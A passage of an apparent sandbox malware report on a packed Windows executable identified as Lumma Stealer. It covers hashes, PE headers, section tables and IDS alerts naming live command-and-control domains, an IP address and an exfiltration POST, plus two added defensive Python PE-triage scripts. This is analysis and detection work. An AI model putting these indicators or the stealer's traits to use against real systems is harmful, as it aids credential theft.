• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: gJkNLYV0ax.exe
File size: 1,880,064 bytes
MD5: f158cdb34eb5c4de5eb858cce72f94cb
SHA1: e93703e534ee3572c5134be5b316e1ae5feeb9c0
SHA256: 801900fc452dc3d0f333fe3be08e78406099be541daff50b7de46f4209d54c0c
SHA512: a913c9e2f3bcd7b6016aa43838679ee3664d042c7457d97c75ed140659748f79a26c606c31c878a84207a6751111dc647292c2e7848c1a9d8c292622de16ce8c
SSDEEP: 24576:qMSCKY+AYJKpksr79fpldtXmnMzqBGn5snAaFuOVCyrhF2LUXasoQV4Y3NyTlZYX:BPKk/hplLX1n5T/EhP3gY9yBZYMMEx
TLSH: AB9533192D287C16C79805754807AA2837B10B225CB1D6AF532E866FED9376EC371EFC
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g..............................J...........@...........................K...........@.................................T0..h..
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x8ad000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
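How the static fields above (8-bit entropy, entry-point section, compile timestamp, the "digitally signed" flag and the data-directory-to-section mapping) are derived from the PE headers, as an added example that is not part of the Joe Sandbox report: a minimal PE32 header walker in Python. Because the sample itself is not on this page, the walker runs against a constructed two-section image built in memory, with the entry point, import table and relocations placed in a section named .taggant, no SECURITY directory, and the report's TimeDateStamp 0x675F3CD1. Header offsets follow the PE/COFF layout; the set of "standard" entry-point sections and the 7.0 bits-per-byte entropy threshold are this example's own assumptions, not the sandbox's rules.

```python
"""Added example (not Joe Sandbox code): a small PE32 header walker that derives the
static-analysis fields shown above and runs against a constructed in-memory image."""
import math
import struct
from collections import Counter
from datetime import datetime, timezone

# Assumption: the sections we consider a normal home for an entry point.
STANDARD_ENTRY_SECTIONS = {".text", "CODE", "INIT", "PAGE"}
DIRECTORY_NAMES = [
    "EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC", "DEBUG",
    "ARCHITECTURE", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT", "IAT",
    "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED",
]

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: close to 8.0 means packed or encrypted, 0 means constant filler."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def parse_pe32(data: bytes) -> dict:
    """Walk DOS header -> PE signature -> COFF header -> optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _, nsections, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (magic 0x10B) is handled here")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    ndirs = struct.unpack_from("<I", data, opt + 92)[0]
    raw_dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsections):
        off = opt + opt_size + 40 * i
        vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", data, off + 8)
        sections.append({"name": data[off:off + 8].rstrip(b"\0").decode("latin-1"),
                         "va": va, "vsize": vsize, "rawsize": rawsize,
                         "entropy": shannon_entropy(data[rawptr:rawptr + rawsize])})

    def section_for(rva):  # name of the section an RVA lands in, or None
        for s in sections:
            if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
                return s["name"]
        return None

    entry_section = section_for(entry_rva)
    return {
        "timestamp": datetime.fromtimestamp(timestamp, tz=timezone.utc),
        "entry_va": image_base + entry_rva,
        "entry_section": entry_section,
        "entry_in_standard_section": entry_section in STANDARD_ENTRY_SECTIONS,
        # A SECURITY directory only says an Authenticode blob is attached, not that it verifies.
        "has_security_directory": ndirs > 4 and raw_dirs[4][1] > 0,
        "file_entropy": shannon_entropy(data),
        "sections": sections,
        "data_directories": [(DIRECTORY_NAMES[i], va, size, section_for(va) if va else None)
                             for i, (va, size) in enumerate(raw_dirs)],
    }

def build_sample_pe32() -> bytes:
    """Constructed test image (not the analysed sample): .text of RET filler plus a
    high-entropy '.taggant' section holding the entry point, imports and relocations."""
    file_align = 0x200
    specs = [(b".text", 0x1000, b"\xC3" * 0x200, 0x60000020),          # name, VA, bytes, flags
             (b".taggant", 0x2000, bytes(range(256)) * 2, 0xE0000020)]
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                                # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(specs), 0x675F3CD1, 0, 0, 224, 0x0102)
    dirs = [(0, 0)] * 16
    dirs[1], dirs[5] = (0x2010, 0x68), (0x2100, 0x8)                     # IMPORT, BASERELOC
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6,
                      0x10B, 14, 0, 0x200, 0x200, 0, 0x2000, 0x1000, 0x2000, 0x400000,
                      0x1000, file_align, 6, 0, 6, 0, 6, 0, 0, 0x3000, file_align, 0,
                      2, 0x8140, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", va, sz) for va, sz in dirs)
    headers, body, raw_ptr = b"", b"", file_align
    for name, va, payload, flags in specs:
        headers += struct.pack("<8sIIIIIIHHI", name, len(payload), va, len(payload),
                               raw_ptr, 0, 0, 0, 0, flags)
        body += payload
        raw_ptr += len(payload)
    return (bytes(dos) + b"PE\0\0" + coff + opt + headers).ljust(file_align, b"\0") + body

def triage(data: bytes) -> list:
    """The report-style findings this header walk can justify on its own."""
    r = parse_pe32(data)
    findings = []
    if not r["entry_in_standard_section"]:
        findings.append(f"entry point 0x{r['entry_va']:x} lies in section {r['entry_section']!r}")
    for s in r["sections"]:
        if s["entropy"] > 7.0:  # assumption: our packing threshold
            findings.append(f"section {s['name']!r} has entropy {s['entropy']:.2f} (packed?)")
    if not r["has_security_directory"]:
        findings.append("no SECURITY directory: not Authenticode-signed")
    return findings
```

Decoding 0x675F3CD1 reproduces the report's Sun Dec 15 20:32:17 2024 UTC, and an entry point in a section such as .taggant is the condition behind "Entry point lies outside standard sections". A whole-file entropy near 8 bits per byte, as the 7.949 above, is the usual static tell for a packed payload; the walker also reports entropy per section so the packed region can be told apart from headers and resources. Two caveats the flags deliberately do not hide: an absent SECURITY directory means unsigned, but a present one does not mean validly signed, and a non-standard section name is not malicious on its own, since commercial packers and protectors use them on legitimate software too.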
Instruction
jmp 00007F6644B37CAAh
jng 00007F6644B37CC2h
add byte ptr [eax], al
jmp 00007F6644B39CA5h
add byte ptr [edi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], cl
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or byte ptr [eax+00000000h], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x53054 | 0x68 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x52000 | 0x1ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x531f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(empty) | 0x1000 | 0x51000 | 0x24800 | cfb2728806fa9cded874d31d9696f11d | False | 0.9974248180650684 | data | 7.981691303814376 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x52000 | 0x1ac | 0x200 | 75720b8ea60aa06a31806981b744f74e | False | 0.5390625 | data | 5.245569576626531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x53000 | 0x1000 | 0x200 | 19a29171433eeef17e42fd663f137134 | False | 0.14453125 | data | 0.9996515881509258 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(empty) | 0x54000 | 0x2b5000 | 0x200 | e63b6326fd2ac679d203201f0419f901 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
iyigrnpu | 0x309000 | 0x1a3000 | 0x1a2c00 | 22ab29aee6304ee0321cfa1ffccdb94b | False | 0.9949096315298508 | Compiled PSI (v2) data (\235z\3737\220\322\370\337\235\3720\241\007) | 7.954353188539169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
tggmxbsn | 0x4ac000 | 0x1000 | 0x400 | 72f1f942a6bc7c0e0900f2751e2d190e | False | 0.7958984375 | data | 6.187155664427365 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x4ad000 | 0x3000 | 0x2200 | e4155e4460cae73a3a9d4336cb9c802d | False | 0.059283088235294115 | DOS executable (COM) | 0.652005510550694 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
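The section table above is the static side of several signatures listed in the overview: every code-bearing section is readable, writable and executable at once; two sections have no name and two others carry random-looking names (iyigrnpu, tggmxbsn); the unnamed section at 0x54000 spans 0x2b5000 bytes in memory but is backed by only 0x200 bytes on disk, which is the usual shape of a region an unpacking stub fills at run time; and the two large sections sit near the 8.0 entropy ceiling. The script below is an added example, not part of the Joe Sandbox report, that parses PE section headers with the Python standard library and reproduces those checks. It builds its own PE image: the section headers copy the name, address, size and characteristics values from the table, but the raw bytes are constructed filler (pseudo-random in the two sections the report lists at entropy ~7.9, zeros elsewhere, so the per-section entropies differ from the report's), and the entry-point RVA is an assumption, since this part of the report does not show it.

```python
"""Section-header triage for a PE file, keyed to the section table above.
Added example, not from the Joe Sandbox report; stdlib only (random.randbytes
needs Python 3.9+). build_sample() emits a constructed image: headers mirror
the report, raw bytes are filler, the entry-point RVA is an assumption."""
import math
import random
import struct

IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE = 0x20000000, 0x40000000, 0x80000000
DATA_RWX = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
DATA_RW = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE

# (name, VirtualAddress, VirtualSize, SizeOfRawData, Characteristics) as listed in the report
REPORT_SECTIONS = [
    ("",         0x001000, 0x051000, 0x024800, DATA_RWX),
    (".rsrc",    0x052000, 0x0001ac, 0x000200, DATA_RW),
    (".idata",   0x053000, 0x001000, 0x000200, DATA_RW),
    ("",         0x054000, 0x2b5000, 0x000200, DATA_RWX),
    ("iyigrnpu", 0x309000, 0x1a3000, 0x1a2c00, DATA_RWX),
    ("tggmxbsn", 0x4ac000, 0x001000, 0x000400, DATA_RWX),
    (".taggant", 0x4ad000, 0x003000, 0x002200, DATA_RWX),
]
RANDOM_FILL = {0, 4}                 # constructed: sections that get pseudo-random filler
ASSUMED_ENTRY_RVA = 0x309000 + 0x10  # assumption: entry point inside "iyigrnpu"
STANDARD_NAMES = {".text", ".data", ".rdata", ".idata", ".edata", ".rsrc", ".reloc",
                  ".bss", ".tls", ".pdata", ".xdata", ".CRT"}


def build_sample(sections=REPORT_SECTIONS, entry_rva=ASSUMED_ENTRY_RVA, seed=1):
    """Emit a minimal PE32 image whose section headers mirror the report."""
    rng = random.Random(seed)
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                        # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)                                           # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 16, entry_rva)                     # AddressOfEntryPoint
    struct.pack_into("<III", opt, 28, 0x400000, 0x1000, 0x200)     # ImageBase, Section/FileAlignment
    raw_ptr = (0x40 + 4 + 20 + 224 + 40 * len(sections) + 0x1FF) & ~0x1FF
    headers, blobs = b"", []
    for i, (name, va, vsize, raw, chars) in enumerate(sections):
        headers += struct.pack("<8sIIIIIIHHI", name.encode(), vsize, va, raw, raw_ptr, 0, 0, 0, 0, chars)
        blobs.append((raw_ptr, rng.randbytes(raw) if i in RANDOM_FILL else bytes(raw)))
        raw_ptr += raw
    image = bytearray(raw_ptr)
    head = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + headers
    image[:len(head)] = head
    for ptr, blob in blobs:
        image[ptr:ptr + len(blob)] = blob
    return bytes(image)


def parse_pe(data):
    """Return (entry_rva, [section dicts]) from the headers of a PE32/PE32+ file."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsec = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]       # same offset in PE32 and PE32+
    sections = []
    for i in range(nsec):
        f = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": f[0].rstrip(b"\0").decode("ascii", "replace"), "vsize": f[1],
                         "va": f[2], "raw": f[3], "raw_ptr": f[4], "chars": f[9]})
    return entry_rva, sections


def shannon_entropy(buf):
    """Bits per byte: 0.0 for empty or constant data, close to 8.0 for random or packed data."""
    n = len(buf)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in (buf.count(v) for v in range(256)) if c)


def triage(data, ratio_limit=16, entropy_limit=7.0):
    """Flag RWX sections, odd names, virtual-only regions (unpack buffers), packed data,
    and an entry point outside the standard sections; returns (entry_section, ok, findings)."""
    entry_rva, sections = parse_pe(data)
    findings, entry_section = {}, None
    for s in sections:
        flags = []
        if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["chars"] & IMAGE_SCN_MEM_WRITE:
            flags.append("RWX")
        if s["name"] == "":
            flags.append("empty-name")
        elif s["name"] not in STANDARD_NAMES:
            flags.append("nonstandard-name")
        if s["raw"] == 0 or s["vsize"] > ratio_limit * s["raw"]:
            flags.append("virtual>>raw")
        ent = shannon_entropy(data[s["raw_ptr"]:s["raw_ptr"] + s["raw"]])
        if ent > entropy_limit:
            flags.append("high-entropy")
        if s["va"] <= entry_rva < s["va"] + max(s["vsize"], s["raw"]):
            entry_section = s["name"]
        findings[(s["va"], s["name"])] = (round(ent, 3), flags)
    return entry_section, entry_section in STANDARD_NAMES, findings


if __name__ == "__main__":
    entry_section, entry_ok, findings = triage(build_sample())
    for (va, name), (ent, flags) in findings.items():
        print(f"{va:#010x} {name or '(empty)':<10} entropy={ent:<6} {' '.join(flags)}")
    print("entry point in", repr(entry_section), "- standard section:", entry_ok)
```

Run against a real file, `triage(open(path, "rb").read())` gives the same per-section flags; the ratio limit of 16 is a heuristic, chosen so that .idata (0x1000 virtual over 0x200 raw, normal padding) passes while the 0x2b5000-over-0x200 region does not.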
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x52058 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-20T16:39:17.895965+0100 | 2058378 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) | 1 | 192.168.2.4 | 58999 | 1.1.1.1 | 53 | UDP
2024-12-20T16:39:18.045613+0100 | 2058364 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) | 1 | 192.168.2.4 | 49217 | 1.1.1.1 | 53 | UDP
2024-12-20T16:39:18.189508+0100 | 2058360 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) | 1 | 192.168.2.4 | 55146 | 1.1.1.1 | 53 | UDP
2024-12-20T16:39:19.893839+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.4 | 49731 | 104.21.21.99 | 443 | TCP
2024-12-20T16:39:19.893839+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49731 | 104.21.21.99 | 443 | TCP
2024-12-20T16:39:34.885495+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49731 | 104.21.21.99 | 443 | TCP
2024-12-20T16:39:34.885495+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49731 | 104.21.21.99 | 443 | TCP
2024-12-20T16:39:36.192992+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.4 | 49734 | 104.21.21.99 | 443 | TCP
2024-12-20T16:39:36.192992+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49734 | 104.21.21.99 | 443 | TCP
2024-12-20T16:39:36.965276+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49734 | 104.21.21.99 | 443 | TCP
2024-12-20T16:39:36.965276+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49734 | 104.21.21.99 | 443 | TCP
2024-12-20T16:39:38.571587+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.4 | 49737 | 104.21.21.99 | 443 | TCP
2024-12-20T16:39:38.571587+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49737 | 104.21.21.99 | 443 | TCP
2024-12-20T16:39:40.841707+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.4 | 49739 | 104.21.21.99 | 443 | TCP
2024-12-20T16:39:40.841707+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49739 | 104.21.21.99 | 443 | TCP
2024-12-20T16:39:43.252650+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.4 | 49741 | 104.21.21.99 | 443 | TCP
2024-12-20T16:39:43.252650+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49741 | 104.21.21.99 | 443 | TCP
2024-12-20T16:39:46.580757+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.4 | 49742 | 104.21.21.99 | 443 | TCP
2024-12-20T16:39:46.580757+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49742 | 104.21.21.99 | 443 | TCP
2024-12-20T16:39:49.456371+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.4 | 49743 | 104.21.21.99 | 443 | TCP
2024-12-20T16:39:49.456371+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49743 | 104.21.21.99 | 443 | TCP
2024-12-20T16:39:49.461411+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49743 | 104.21.21.99 | 443 | TCP
2024-12-20T16:39:49.461411+0100 | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 1 | 192.168.2.4 | 49743 | 104.21.21.99 | 443 | TCP
2024-12-20T16:39:53.857296+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.4 | 49744 | 104.21.21.99 | 443 | TCP
2024-12-20T16:39:53.857296+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49744 | 104.21.21.99 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 20, 2024 16:39:18.339473963 CET | 49731 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:18.339508057 CET | 443 | 49731 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:18.339584112 CET | 49731 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:18.343544960 CET | 49731 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:18.343559027 CET | 443 | 49731 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:19.893619061 CET | 443 | 49731 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:19.893838882 CET | 49731 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:19.896661997 CET | 49731 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:19.896676064 CET | 443 | 49731 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:19.896939993 CET | 443 | 49731 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:19.950104952 CET | 49731 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:19.950135946 CET | 49731 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:19.950252056 CET | 443 | 49731 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:34.885148048 CET | 443 | 49731 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:34.885258913 CET | 443 | 49731 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:34.885377884 CET | 49731 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:34.907138109 CET | 49731 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:34.907167912 CET | 443 | 49731 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:34.907181025 CET | 49731 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:34.907186031 CET | 443 | 49731 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:34.977003098 CET | 49734 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:34.977057934 CET | 443 | 49734 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:34.977128029 CET | 49734 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:34.978379965 CET | 49734 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:34.978401899 CET | 443 | 49734 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:36.192914963 CET | 443 | 49734 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:36.192991972 CET | 49734 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:36.218904018 CET | 49734 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:36.218952894 CET | 443 | 49734 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:36.219310999 CET | 443 | 49734 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:36.220854998 CET | 49734 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:36.220880985 CET | 49734 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:36.220946074 CET | 443 | 49734 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:36.965282917 CET | 443 | 49734 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:36.965348005 CET | 443 | 49734 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:36.965399981 CET | 49734 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:36.965447903 CET | 443 | 49734 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:36.965909958 CET | 443 | 49734 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:36.965949059 CET | 443 | 49734 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:36.965959072 CET | 49734 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:36.965974092 CET | 443 | 49734 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:36.966023922 CET | 443 | 49734 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:36.966078997 CET | 49734 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:36.966088057 CET | 443 | 49734 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:36.966124058 CET | 49734 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:36.973709106 CET | 443 | 49734 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:36.984934092 CET | 443 | 49734 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:36.984986067 CET | 49734 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:36.985019922 CET | 443 | 49734 | 104.21.21.99 | 192.168.2.4
